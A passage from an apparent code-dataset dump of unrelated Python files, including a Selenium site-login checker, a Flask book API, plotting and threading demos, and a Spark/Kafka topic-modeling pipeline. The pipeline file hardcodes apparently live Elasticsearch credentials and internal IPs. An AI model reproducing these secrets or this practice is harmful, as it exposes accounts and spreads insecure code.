timeout'\n }\n message['command_response_process_time'] = int(time.time() * 1000)\n\n unresponse_info = adapter_serializers.AdapterCommandStatus.clean_command_cache()\n for command_uuid, command_info in unresponse_info.items():\n message['command_uuid'] = command_uuid\n for timestamp, terminals in command_info.items():\n message['command_generate_time'] = int(timestamp * 1000)\n for terminal in terminals:\n temp_message = copy.copy(message)\n\n temp_message['terminal'] = terminal\n\n terminal_api = TerminalAPI(terminal)\n\n temp_message['organization_id'] = terminal_api.get_org_ids()\n temp_message['organization_name'] = terminal_api.get_org_names()\n temp_message['organization_isp'] = terminal_api.get_register_isp()\n\n temp_message['province'] = terminal_api.get_register_province()\n temp_message['city'] = 
terminal_api.get_register_city()\n                    messages.append(temp_message)\n        # store message\n        pprint.pprint(messages)\n        for data in messages:\n            store_message(type='error', data=data)\n\n    def do(self):\n        if self.stage == 'distribute':\n            self.distribute_command()\n        elif self.stage == 'dead':\n            self.process_dead_command()\n        elif self.stage == 'response':\n            self.process_dial_response()\n        else:\n            # TODO:\n            pass\n","sub_path":"benchmark/backends/command_adapter/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"311431440","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait # wait for the target tag\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException # handle the exception when the tag is missing\nimport schedule\nimport time\nimport smtplib\nimport datetime\nfrom email.mime.text import MIMEText\nimport daemon\n\n\n\n\ndef job_checkTheSite():\n\toptions = webdriver.ChromeOptions()\n\toptions.add_argument('headless')\n\toptions.add_argument('window-size=1920x1080')\n\toptions.add_argument(\"disable-gpu\")\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\") # Korean locale!\n\tdriver = webdriver.Chrome(executable_path=r'/Users/steve/Downloads/chromedriver', options=options)\n\t#driver = webdriver.Chrome(executable_path=r'c:\\util\\chromedriver.exe', chrome_options=options)\n\tdriver.implicitly_wait(1)\n\n\t \n\ttry: # normal path\n\n\t\tnow = datetime.datetime.now()\n\t\tnowDatetime = now.strftime('%Y-%m-%d %H:%M:%S')\n\t\tprint(nowDatetime)\n\t\twith open('/tmp/echo.txt', 'a') as fh:\n\t\t\tfh.write(\"{}\\n\".format(nowDatetime))\n\n\t\tdriver.get('https://learn.hoseo.edu')\n\t\t# Enter the username/password.\n\t\tdriver.find_element_by_name('user_id').send_keys('1111')\n\t\tdriver.find_element_by_name('password').send_keys('1111')\n\t\tdriver.find_element_by_xpath('//*[@id=\"entry-login\"]').click()\n\t\t# driver = webdriver.Chrome(executable_path=r'C:\\path\\to\\chromedriver.exe')\n\t\t# driver.get('http://google.com/')\n\n\t \n\t# except TimeoutException: # exception handling\n\texcept Exception as e:\n\n\t\trecipients = ['ramiah@nate.com','hunter0x01@gmail.com']\n\t\tsmtp = smtplib.SMTP('smtp.gmail.com', 587)\n\t\tsmtp.ehlo() # say Hello\n\t\tsmtp.starttls() # required when using TLS\n\t\tsmtp.login('hunter0x01@gmail.com', '1111')\n\n\t\tmsg = MIMEText('An exception occurred while accessing Blackboard.')\n\t\tmsg['Subject'] = 'A Blackboard exception occurred.'\n\t\tmsg['To'] = \", \".join(recipients)\n\t\tsmtp.sendmail('hunter0x01@gmail.com', 'hunter0x01@gmail.com', msg.as_string())\n\t \n\t\tsmtp.quit()\n\t \n\tfinally: # always runs, whether we succeeded or an exception occurred\n\t driver.quit()\n\n# Check the website on a schedule (every 10 seconds).\nschedule.every(10).seconds.do(job_checkTheSite)\n\n\ndef main():\n\ttry:\n\n\t\twhile True: \n\t\t\tschedule.run_pending() \n\t\t\ttime.sleep(1)\n\n\texcept KeyboardInterrupt:\n\t print('Exiting!!')\n\n\nwith daemon.DaemonContext():\n\tmain()\n\n\n","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"186762789","text":"\"\"\"Plot function definitions.\"\"\"\n\nimport numpy as np\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport seaborn\n\n\ndef 
plot_battery_cases_comparisons_bubbles(\n        read_path,\n        results_path,\n        plot_type\n        # Choices: 'simple_payback_time', 'discounted_payback_time', 'storage_size', 'efficiency', 'energy_cost',\n        # 'operation_cost_savings_annual', 'operation_cost_savings_annual_percentage'.\n):\n    \"\"\"Plot various battery case comparisons.\"\"\"\n\n    # Define plot settings.\n    seaborn.set()\n    plt.rcParams['font.serif'] = 'Arial'\n    plt.rcParams['font.family'] = 'serif'\n\n    # Load result data for plotting.\n    results = pd.read_csv(read_path, index_col='battery_technology')\n    set_years = results.columns\n    set_battery_technologies = results.index\n    x_array = np.arange(1, set_years.shape[0]+1, 1)\n    y_array = np.arange(1, set_battery_technologies.shape[0]+1, 1)\n    colors = matplotlib.cm.Paired(np.linspace(0, 1, set_battery_technologies.shape[0]))\n\n    # Create plot.\n    (fig, ax) = plt.subplots(1, 1)\n    for i_battery_technology in np.arange(0, set_battery_technologies.shape[0], 1):\n        for i_year in np.arange(0, len(x_array), 1):\n            ax.scatter(\n                x_array[i_year],\n                y_array[i_battery_technology],\n                marker='o', facecolors=colors[i_battery_technology], edgecolors='none',\n                s=(\n                    2000.0/max(results.max(axis=0)) * results.iloc[i_battery_technology, i_year]\n                    if max(results.max(axis=0)) != 0.0 else 0.0\n                ),\n                alpha=0.7\n            )\n\n            if results.iloc[i_battery_technology, i_year] != 0.0:\n                ax.text(\n                    x_array[i_year], y_array[i_battery_technology],\n                    (\n                        format(\n                            results.iloc[i_battery_technology, i_year],\n                            ('.0f' if plot_type != 'efficiency' and plot_type != 'operation_cost_savings_annual_percentage' else '.2f')\n                        )\n                        + ('%' if plot_type == 'operation_cost_savings_annual_percentage' else '')\n                    ),\n                    weight='bold',\n                    fontsize=9,\n                    bbox={'facecolor': 'none', 'alpha': 0.5, 'pad': 1, 'edgecolor': 'none'},\n                    ha='center', va='center'\n                )\n\n    # Modify plot.\n    ax.set_xticks(x_array)\n    x_labels = [item.get_text() for item in ax.get_xticklabels()]\n    for i_year in np.arange(0, len(x_array), 1):\n        x_labels[i_year] = set_years[i_year]\n    ax.set_xticklabels(x_labels)\n    legend_labels = ['Flooded LA', 'VRLA', 'LFP', 'NCA', 'NMC', 'LTO', 'NaNiCl'] # TODO: Make labels dynamic.\n    ax.set_yticks(y_array)\n    y_labels = [item.get_text() for item in ax.get_yticklabels()]\n    for i in np.arange(0, len(y_array), 1):\n        y_labels[i] = legend_labels[i]\n    ax.set_yticklabels(y_labels)\n    ax.set_aspect(aspect=0.5)\n\n    # Modify plot title.\n    if plot_type == 'simple_payback_time':\n        title = 'Simple payback time in years'\n    elif plot_type == 'discounted_payback_time':\n        title = 'Discounted payback time in years'\n    elif plot_type == 'storage_size':\n        title = 'Storage size in kWh'\n    elif plot_type == 'efficiency':\n        title = 'Efficiency in %'\n    elif plot_type == 'operation_cost_savings_annual':\n        title = 'Annual operation cost savings in SGD'\n    elif plot_type == 'operation_cost_savings_annual_percentage':\n        title = 'Relative annual operation cost savings in %'\n    ax.title.set_text(title)\n\n    # Save plot to SVG.\n    fig.savefig(os.path.join(results_path, plot_type + '.svg'))\n\n\ndef plot_battery_cases_payback_comparison_lines(\n        read_path,\n        results_path,\n        plot_type # Choices: 'simple_payback_time', 'discounted_payback_time'.\n):\n    \"\"\"Plot battery cases payback time comparison.\"\"\"\n\n    # Define plot settings.\n    seaborn.set()\n    plt.rcParams['font.serif'] = 'Arial'\n    plt.rcParams['font.family'] = 'serif'\n\n    # Load result data for plotting.\n    results = pd.read_csv(read_path, index_col='battery_technology')\n    years = results.columns\n    x_array = np.arange(1, years.shape[0]+1, 1)\n    techs = results.index\n    colors = 
matplotlib.cm.Paired(np.linspace(0, 1, techs.shape[0]))\n\n    # Create plot.\n    fig, ax = plt.subplots(1, 1)\n    for i in np.arange(0, techs.shape[0], 1):\n        ax.scatter(\n            x_array,\n            np.array(results.iloc[i, :]),\n            marker='o', facecolors='none', edgecolors=colors[i], s=70\n        )\n        ax.plot(\n            x_array,\n            np.array(results.iloc[i, :]),\n            linestyle='-', color=colors[i], label='%s' % techs[i]\n        )\n\n    # Modify plot.\n    ax.legend(loc='upper right', fontsize=9)\n    ax.set_ylabel('years')\n    ax.set_xticks(x_array)\n    labels = [item.get_text() for item in ax.get_xticklabels()]\n    for y in np.arange(0, len(x_array), 1):\n        labels[y] = years[y]\n    ax.set_xticklabels(labels)\n\n    # Modify plot title.\n    if plot_type == 'discounted_payback_time':\n        title = 'Discounted payback time in years.'\n    else:\n        title = 'Simple payback time in years.'\n    fig.suptitle(title)\n\n    # Save plot to SVG.\n    fig.savefig(os.path.join(results_path, plot_type + '_comparison.svg'))\n","sub_path":"cobmo/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"185356178","text":"import threading\nimport concurrent.futures\nimport time\n\nstart = time.perf_counter()\n\ndef do_something(second):\n    print(f\"I am sleeping for {second} second(s)\")\n    time.sleep(second)\n    return \"done sleeping\"\n\n\nt1 = threading.Thread(target=do_something, args=[1]) # making a thread (1); do_something requires an argument\nt2 = threading.Thread(target=do_something, args=[1]) # making a thread (2)\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join() \n\n# making 10 threads\n\nthreads = []\nfor _ in range(10):\n    t = threading.Thread(target=do_something, args=[1.5])\n    t.start()\n    threads.append(t)\n\nfor thread in threads:\n    thread.join()\n\n# alternative to threading\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n    \n    f1 = executor.submit(do_something, 1)\n    f2 = executor.submit(do_something, 1)\n\n    print(f1.result())\n    print(f2.result())\n\n    secs = [5,4,3,2,1,1,4,3,2,5]\n\n    results = [executor.submit(do_something, sec) for sec in secs]\n\n    for f in concurrent.futures.as_completed(results):\n        print(f.result())\n\n# alternative to threading and executor.submit\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n\n    secs = [5,5,4,3,2,1,4,3]\n    results = executor.map(do_something, secs)\n\n    for result in results:\n        print(result)\n\nfinish = time.perf_counter()\n\nprint(f'finished in {round(finish-start,2)} seconds')","sub_path":"Threading/threading-2.py","file_name":"threading-2.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"325046216","text":"\"\"\"Is the tree symmetric.\n\nGiven a binary tree t, determine whether it is symmetric around its center,\ni.e. 
each side mirrors the other.\n\nCreated on Sun Sep 26 09:45:48 2021\n\n@author: gonzo\n\"\"\"\n\n\nfrom collections import deque\n\n\nclass Vertex:\n    \"\"\"Vertex object in a binary tree.\"\"\"\n\n    def __init__(self):\n        \"\"\"Initialize Vertex object.\n\n        Fields\n        ----------\n        value : int\n            The value of node v\n        left : None\n            The left child of node v\n        right : None\n            The right child of node v\n        \"\"\"\n        self.value = None\n        self.left = None\n        self.right = None\n\n\ndef is_tree_symmetric(root):\n    \"\"\"Use BFS to check that each level is symmetric around the centre.\"\"\"\n    # An empty tree or a single node is symmetric\n    if root is None or (root.left is None and root.right is None):\n        return True\n    # Only one child of root exists\n    elif root.left is None and root.right is not None or \\\n            root.right is None and root.left is not None:\n        return False\n    else:\n        # Enqueue both children of root since they exist\n        q = deque([root.left, root.right])\n\n        while q:\n            left_node = q.popleft()\n            right_node = q.popleft()\n\n            if left_node.value != right_node.value:\n                return False\n            else:\n                # Append left child of left subtree and right child of right\n                # subtree if they both exist\n                if left_node.left is not None and right_node.right is not None:\n                    q.append(left_node.left)\n                    q.append(right_node.right) \n                # If only one exists then it's asymmetric\n                elif left_node.left is None and right_node.right is not None or \\\n                        left_node.left is not None and right_node.right is None:\n                    return False\n                \n                # Append right child of left subtree and left child of right\n                # subtree if they both exist\n                if left_node.right is not None and right_node.left is not None:\n                    q.append(left_node.right)\n                    q.append(right_node.left)\n                elif left_node.right is None and right_node.left is not None or \\\n                        left_node.right is not None and right_node.left is None:\n                    return False\n\n        return True\n\n\nif __name__ == '__main__':\n\n    # t = {\n    #     \"value\": 1,\n    #     \"left\": {\n    #         \"value\": 2,\n    #         \"left\": {\n    #             \"value\": 3,\n    #             \"left\": None,\n    #             \"right\": None\n    #         },\n    #         \"right\": {\n    #             \"value\": 4,\n    #             \"left\": None,\n    #             \"right\": None\n    #         }\n    #     },\n    #     \"right\": {\n    #         \"value\": 2,\n    #         \"left\": {\n    #             \"value\": 4,\n    #             \"left\": None,\n    #             \"right\": None\n    #         },\n    #         \"right\": {\n    #             \"value\": 3,\n    #             \"left\": None,\n    #             \"right\": None\n    #         }\n    #     }\n    # }\n\n    # t = {\"value\": 1,\n    #      \"left\": {\n    #          \"value\": 2,\n    #          \"left\": None,\n    #          \"right\": {\n    #              \"value\": 3,\n    #              \"left\": None,\n    #              \"right\": None\n    #          }\n    #      },\n    #      \"right\": {\n    #          \"value\": 2,\n    #          \"left\": None,\n    #          \"right\": {\n    #              \"value\": 3,\n    #              \"left\": None,\n    #              \"right\": None\n    #          }\n    #      }\n    #      }\n\n    # root = Vertex()\n    # root.value = 1\n    # root.left = Vertex()\n    # root.left.value = 2\n    # root.left.left = Vertex()\n    # root.left.left.value = 3\n    # root.left.left.left = None\n    # root.left.left.right = None\n    # root.left.right = Vertex()\n    # root.left.right.value = 4\n    # root.left.right.left = None\n    # root.left.right.right = None\n\n    # root.right = Vertex()\n    # root.right.value = 2\n    # root.right.left = Vertex()\n    # root.right.left.value = 4\n    # root.right.left.left = None\n    # root.right.left.right = None\n    # root.right.right = Vertex()\n    # root.right.right.value = 3\n    # root.right.right.left = None\n    # root.right.right.right = None\n\n    # root = Vertex()\n    # root.value = 1000\n    \n    # root = Vertex()\n    # root.value = 0\n    # root.left = Vertex()\n    # root.left.value = 6\n\n    # root = Vertex()\n    root = None\n\n    
print(is_tree_symmetric(root))\n\n","sub_path":"Interview_Practice/Data_Structures/Trees/is_tree_symmetric.py","file_name":"is_tree_symmetric.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"494675279","text":"import logging\n\n\ndef get_logger(file_name:str):\n    \"\"\"logger module for logging\n    args: file_name (str) : Name of the file being used\"\"\"\n    logger = logging.getLogger(file_name)\n    formatter = logging.Formatter(\n        \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n        datefmt=\"%m/%d/%Y %H:%M:%S\",\n    )\n    handler = logging.StreamHandler()\n    handler.setFormatter(formatter)\n    logger.addHandler(handler)\n    logger.setLevel(logging.INFO)\n    return logger\n","sub_path":"utils/logger_module.py","file_name":"logger_module.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"234544969","text":"\"\"\"\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\nsqrt(2) = 1 + 1/(2 + 1/(2 + 1/(2 + ...)))\nBy expanding this for the first four iterations, we get:\n\n1 + 1/2 = 3/2 = 1.5\n1 + 1/(2 + 1/2) = 7/5 = 1.4\n1 + 1/(2 + 1/(2 + 1/2)) = 17/12 = 1.41666…\n1 + 1/(2 + 1/(2 + 1/(2 + 1/2))) = 41/29 = 1.41379…\n\nThe next three expansions are 99/70, 239/169, and 577/408, but the eighth expansion, 1393/985, is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than the denominator?\n\"\"\"\nimport time\nfrom fractions import Fraction\nstart_time = time.time()\n\ncount = 2\ntotal = 0\nres = 2 + Fraction(1, 2)\n\nfor x in range(0, 1001):\n    while count < x:\n        res = 2 + 1 / res\n        count += 1\n    # print(count, 1 + 1 / res)\n    if len(str(Fraction(1 + 1 / res).numerator)) > len(str(Fraction(1 + 1 / res).denominator)):\n        total += 1\n\nprint(total)\n\n\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n# input()","sub_path":"57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"100047318","text":"# %load q08_preprocessing/build.py\nimport pandas as pd\nimport numpy as np\nimport sys,os\nsys.path.append(os.path.join(os.path.dirname(os.curdir)))\nfrom greyatomlib.game_of_thrones.q01_feature_engineering.build import q01_feature_engineering\nfrom greyatomlib.game_of_thrones.q07_culture_survival.build import q07_culture_survival\n\nbattles = pd.read_csv('data/battles.csv')\ncharacter_predictions = pd.read_csv('data/character-predictions.csv')\n\nbattle, character_pred = q01_feature_engineering(battles,character_predictions)\ndef q08_preprocessing(data):\n    #'write your solution here'\n    colu = ['title','culture','mother','father','house','heir' ,'spouse']\n    for col in colu:\n        data[col] = pd.factorize(data[col])[0]\n    col_1 = ['name', 'alive', 'pred', 'plod', 'isAlive', 'dateOfBirth']\n    data = data.drop(col_1, 1) \n    col = data.columns\n    for c in col:\n        data[c] = data[c].replace(['.', '_'], ' ')\n    for c in col:\n        data[c] = data[c].replace(np.nan, -1)\n    \n    return (data)\n\n# q08_preprocessing(character_pred)\n\n\n","sub_path":"q08_preprocessing/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"365971924","text":"from flask import Flask, request, 
jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + os.path.join(basedir, \"app.sqlite\")\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\nclass Book(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    title = db.Column(db.String(100), nullable=False)\n    author = db.Column(db.String(100), nullable=False)\n    url = db.Column(db.String(100), nullable=False)\n    genre = db.Column(db.String(100), nullable=False)\n    star_rating = db.Column(db.String(100), nullable=False)\n    book_read = db.Column(db.Boolean)\n\n\nclass bookSchema(ma.Schema):\n    class Meta:\n        fields = (\"id\", \"title\", \"author\", \"url\", \"genre\", \"star_rating\", \"book_read\")\n\nbook_schema = bookSchema()\nbooks_schema = bookSchema(many=True)\n\n# POST\n@app.route(\"/add-book\", methods=[\"POST\"])\ndef add_book():\n    title = request.json[\"title\"]\n    author = request.json[\"author\"]\n    url = request.json[\"url\"]\n    genre = request.json[\"genre\"]\n    star_rating = request.json[\"star_rating\"]\n    book_read = request.json[\"book_read\"]\n    new_book = Book(title=title, author=author, url=url, genre=genre, star_rating=star_rating, book_read=book_read)\n    db.session.add(new_book)\n    db.session.commit()\n    return jsonify(message=\"Success\")\n\n\n# GET\n@app.route(\"/books\", methods=[\"GET\"])\ndef get_books():\n    order = request.args.get('order')\n    if (order == 'desc'):\n        all_books = Book.query.order_by(Book.id.desc()).all()\n    else:\n        all_books = Book.query.all()\n    result = books_schema.dump(all_books)\n    return jsonify(result)\n\n\n# PUT/PATCH by ID\n@app.route(\"/book-read/<id>\", methods=[\"PATCH\"])\ndef update_book(id):\n    book = Book.query.get(id)\n    book.book_read = request.json[\"book_read\"]\n    db.session.commit()\n    return jsonify(message=\"Book Updated\")\n\n\n# DELETE\n@app.route(\"/delete-book/<id>\", methods=[\"DELETE\"])\ndef delete_book(id):\n    book = Book.query.get(id)\n    db.session.delete(book)\n    db.session.commit()\n    return jsonify(message=\"Book Deleted!\")\n\n\nif __name__ == \"__main__\":\n    app.debug = True\n    app.run()","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"320053485","text":"import pyspark\nfrom pyspark.sql.functions import *\nfrom pyspark.sql import SQLContext, SparkSession, Row\nfrom nltk.corpus import stopwords\nimport re as re\nimport os\nfrom pyspark.ml.feature import CountVectorizer , IDF, Tokenizer, StopWordsRemover\nfrom kafka import KafkaConsumer\nfrom pyspark.mllib.linalg import Vector, Vectors\n# from pyspark.mllib.clustering import LDA, LDAModel\nfrom pyspark.ml.clustering import LDA as newLDA\nimport json\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport time\n\n# data = sqlContext.read.format(\"csv\").options(header='true', inferschema='true')\\\n#     .load(os.path.realpath(\"clothingReviews.csv\"))\n# reviews = data.filter(\"'Review Text' IS NOT NULL\")['Review Text']\n# reviewsRdd = reviews.rdd\n#\n# tokens = reviewsRdd \\\n#     .map( lambda document: document.strip().lower()) \\\n#     .map( lambda document: re.split(\" \", document)) \\\n#     .map( lambda word: [x for x in word if x.isalpha()]) \\\n#     .map( lambda word: [x for x in word if len(x) > 3] ) \\\n#     .map( lambda word: [x for x in word if x not in StopWords]) \\\n#     
.zipWithIndex()\n\nclass SparkInstance:\n    def __init__(self,AppName =\"NLPApp\"):\n        self.sparkSess = SparkSession.builder.master(\"spark://152.7.99.47:7077\").appName(\"TopicModeling\").getOrCreate()\n        self.sc = self.sparkSess.sparkContext\n        self.sqlContext = SQLContext(self.sc)\n\n    def closeConnection(self):\n        self.sc.stop()\n\nclass ConsumerInstance():\n    def __init__(self, brokerList=\"localhost:9092\", topicList=\"default-topic\"):\n        self.bootstrapServerList = brokerList\n        self.topics = topicList\n        self.Consumer = KafkaConsumer(bootstrap_servers=self.bootstrapServerList,\n                                      auto_offset_reset='earliest',\n                                      consumer_timeout_ms=1000)\n        self.Consumer.subscribe(self.topics)\n\n    def close(self):\n        self.Consumer.close()\n\n    def getKafkaConsumer(self):\n        return self.Consumer\n\ndef getTopics(sc,sqlContext,inpSubtitles):\n    # myInp = \"Topics correspond to cluster centers, and documents correspond to examples rows in a dataset \\nTopics and documents both exist in a feature space, where feature vectors are vectors of word counts bag of words \\nRather than estimating a clustering using a traditional distance, LDA uses a function based on a statistical model of how text documents are generated\"\n    myInp = inpSubtitles\n    inpData = sc.parallelize(myInp.splitlines())\n    # myInpSplittedList = inpData.map(lambda x: x.split('\\n') )\n    # res = myInpSplittedList.collect()\n    row_rdd = inpData.map(lambda x: re.sub(\"\\s+\",\" \",x))\\\n        .map(lambda x: x.split(\" \"))\\\n        .map(lambda x: [word for word in x if word != ''])\\\n        .map(lambda x: Row(x))\n    df = sqlContext.createDataFrame(row_rdd, ['allWords'])\n    mainDf = df.withColumn(\"index\", monotonically_increasing_id())\n\n    remover = StopWordsRemover(inputCol=\"allWords\", outputCol=\"words\")\n    res = remover.transform(mainDf)\n    cv = CountVectorizer(inputCol=\"words\", outputCol=\"features\")\n    model = cv.fit(res) # even df works\n    result = model.transform(res)\n    #result.show(truncate=False)\n\n    idf = IDF(inputCol=\"features\", outputCol=\"finalFeatures\")\n    idfModel = idf.fit(result)\n    result_tfidf = idfModel.transform(result)\n    num_topics = 5\n    # lda_model = LDA.train(result_tfidf['index','finalFeatures'],k = num_topics, maxIterations= 100)\n    lda_obj = newLDA(featuresCol=\"finalFeatures\", k=3, maxIter=100)\n    lda_model = lda_obj.fit(result_tfidf[\"index\", \"finalFeatures\"])\n    #lda_model.describeTopics().show()\n    topics = lda_model.describeTopics()\n    topics_rdd = topics.rdd\n    vocab = model.vocabulary\n    topicsWordsRdd = topics_rdd.map(lambda x: x['termIndices']).map(lambda x: [vocab[idx] for idx in x])\n\n    topics_words = topicsWordsRdd.collect()\n    # for idx, topic in enumerate(topics_words):\n    #     print(\"topic: \", idx)\n    #\n    #     for word in topic:\n    #         print(word + \",\", end=\" \")\n    #     print(\"----------\")\n    return topics_words\n\ndef getSubsMetaFromRecord(message):\n    valBytes = message.value\n    decodedValueString = valBytes.decode(\"utf-8\")\n    valueStringModified = decodedValueString.replace(\"'\", '\"')\n    #print(valueStringModified)\n    valueJson = json.loads(valueStringModified)\n    #print(messageJson)\n    return valueJson\n\ndef getTopKeywordsFromTopics(inpTopics):\n    topKeywordList = []\n    for topic in inpTopics:\n        topKeywordList.extend(topic[0:3])\n\n    return topKeywordList\n\n\ndef main():\n    kafkaBrokerList = [\"152.46.17.189:9092\", \"152.46.17.100:9092\", \"152.46.16.167:9092\"]\n    topicNameList = [\"VideoSubtitles\"]\n    DataReader = ConsumerInstance(kafkaBrokerList, topicNameList).getKafkaConsumer()\n    print(\"Kafka Cluster Connected\")\n    sparkInst = 
SparkInstance()\n    sparkInst.sc.setLogLevel(\"WARN\")\n    print(\"Spark Cluster Connected\")\n    es = Elasticsearch(\n        ['https://a58c0275b4c1417bb6316d68575d3f85.us-east-1.aws.found.io:9243'],\n        http_auth=('elastic', 'B7Zck6OCKO1cQ85ftjlqNE7W'),\n        scheme=\"https\",\n        port=443,\n    )\n    print(\"Elasticsearch Connected\")\n\n\n    try:\n        while True:\n            for record in DataReader:\n                if(record):\n                    # print(record.value)\n                    # print(message)\n                    try:\n                        subsMetaDict = getSubsMetaFromRecord(record)\n                    except:\n                        print(\"Error in Parsing input from Kafka \"+record.value.decode(\"utf-8\"))\n                        print(\"\\n###################----------###################\\n\")\n                        continue\n                    print(subsMetaDict['meta'])\n                    doc = {}\n                    doc['meta'] = subsMetaDict['meta']\n                    metaDat = doc['meta']\n                    ind = metaDat['id']\n                    if not es.exists(index=\"keywordrecommender\", doc_type='keywords', id = ind):\n                        topicsWordArrayList = getTopics(sparkInst.sc, sparkInst.sqlContext, subsMetaDict['extract'])\n                        topKeywordsList = getTopKeywordsFromTopics(topicsWordArrayList)\n                        print(topKeywordsList)\n                        doc['keywords'] = topKeywordsList\n                        # print(ind)\n                        res = es.index(index=\"keywordrecommender\", doc_type='keywords', id = ind, body=doc)\n                        print(res['result'])\n                    else:\n                        print(\"Video already Processed. Skipping\")\n                    print(\"\\n###################----------###################\\n\")\n                    # count += 1\n                    # if count > 2:\n                    #     break\n            # print(topicsWordArrayList)\n            # for message in DataReader.poll(max_records=1):\n            print(\"Buffer Empty. Wait for 10 min to try again\")\n            time.sleep(600)\n    except Exception as e:\n        print(\"Error Occurred: \"+str(e))\n    finally:\n        # sparkInst.closeConnection()\n        DataReader.close()\n        # es.close()\n        print(\"Spark and Kafka Connections closed!\")\n\n#sc.stop()\n#print(res)\n#data = []\nif __name__ == \"__main__\":\n    main()\n","sub_path":"MainPipeline/NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"492523327","text":"max = int(input(\"Find primes up to what number?: \"))\n\ndef solution_1(num):\n    prime_nums = []\n    for x in range(2, num + 1): # check every candidate from 2 to num\n        isPrime = True\n        for y in range(2, x):\n            if x % y == 0:\n                isPrime = False\n                break\n        if isPrime: \n            prime_nums.append(x)\n    return prime_nums\n\n\n## stop at square root of each number\ndef solution_2(num):\n    prime_nums = []\n    for x in range(2, num + 1):\n        isPrime = True\n        for y in range(2, int(x**0.5)+1):\n            if x % y == 0:\n                isPrime = False\n                break\n        if isPrime: \n            prime_nums.append(x)\n    return prime_nums\n\n\nprint(solution_2(max))\n\n## solution 3\nstart = 11\nend = 25\n\nfor i in range(start,end):\n    if i>1:\n        for j in range(2,i):\n            if(i % j==0):\n                break\n        else:\n            print(i)","sub_path":"prime_numbers.py","file_name":"prime_numbers.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"193914932","text":"from enum import Enum\nMonth=Enum('kk',('jan','feb','mon'))\nprint(Month.__name__)# the class name is 'kk'\nprint(type(Month))# Month is a class, not an instance\nmoth=Month(1)# Month(1) looks up the member whose value is 1, i.e. Month.jan\nprint(Month.jan.value)#\n\nclass Week(Enum):\n    Sun=0\n    Mon=1\n    Tue=2\nprint(Week.Sun.value)# after getting an enum member, read its value via .value\n# use type() to tell whether something is an instance or a class\n","sub_path":"practice_oop/Ex_Enum.py","file_name":"Ex_Enum.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"204648068","text":"import pandas as pd\n\ndf = pd.read_csv('symbol.csv')\ndf.head()\n\nkeyword = 
df['keyword'].dropna().values\nmath_oprator = df['Arithmetic Operators'].dropna().values\nlogical = df['Logical Operators'].dropna().values\nbitwise = df['Bitwise Operators'].dropna().values\nother = df['Other Operators'].dropna().values\n\nf = open('in', 'r')\nfile = f.read()\n\ndef lexical_analyzer(file):\n return file.split()\n\ndef symbol_table(inputs):\n k = []\n m = []\n l = []\n b = []\n o = []\n n = []\n i = []\n f = []\n\n for data in inputs:\n if data in keyword:\n if data not in k:\n k.append(data)\n elif data in math_oprator:\n if data not in m:\n m.append(data)\n elif data in logical:\n if data not in l:\n l.append(data)\n elif data in bitwise:\n if data not in b:\n b.append(data)\n elif data in other:\n if data not in o:\n o.append(data)\n else:\n try:\n num = int(data)\n if num not in n:\n n.append(num)\n except:\n try:\n num = float(data)\n if num not in f:\n f.append(num)\n except:\n if data not in i:\n i.append(data)\n\n outputs = {\n 'Keywords': k,\n 'Identifiers': i,\n 'Math Operators': m,\n 'Logical Operators': l + b,\n 'Numerical Values': n + f,\n 'Others': o\n }\n return outputs\n\nlexic = lexical_analyzer(file)\ntable = symbol_table(inputs=lexic)\ndf1 = 